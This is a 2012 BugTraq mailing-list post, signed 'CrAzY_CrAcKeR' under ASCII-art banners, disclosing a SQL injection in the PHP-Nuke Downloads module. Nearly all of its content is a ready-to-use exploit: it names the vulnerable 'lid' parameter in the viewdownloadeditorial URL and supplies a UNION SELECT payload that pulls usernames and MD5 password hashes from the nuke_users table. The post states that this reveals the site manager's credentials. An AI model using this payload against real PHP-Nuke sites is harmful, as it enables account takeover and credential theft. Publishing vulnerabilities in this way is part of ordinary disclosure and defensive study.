BugTraq
PHPNuke Module's Name Download SQL Injection Vulnerabilities Apr 05 2012 07:58PM
CrAzY_CrAcKeR phx1-ss-2-lb cnet com
##################################################################
##################################################################
#
# _ _ _
# .-" "-.
# / # | |
# |, .-. .-. ,|
# | )(_o/ \o_)( |
# |/ /\ \|
# (@_ (_ ^^ _)
# _ ) \_______\__|IIIIII|__/_______________________________
# (_)@8@8{}<________|-\IIIIII/-|________________________________>
# )_/ \ /
# (@
#
# +-+-+-+-+-+-+-+-+-+-+
# --+CrAzY CrAcKeR+--
# +-+-+-+-+-+-+-+-+-+-+
#
#
##################################################################
##################################################################
# Example:-
#
# [-] www.???.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=(s
ql)
#
# [-] Injection code.... ( -1+union+select+username,1,user_password,user_id+from+nuke_users )
#
# [-] www.???.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1
+union+select+username,1,user_password,user_id+from+nuke_users
#
# [-] you see now password (md5) and the name of the site manager
####################################################################
# Greeting to my friend A7eb Alwrd
####################################################################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus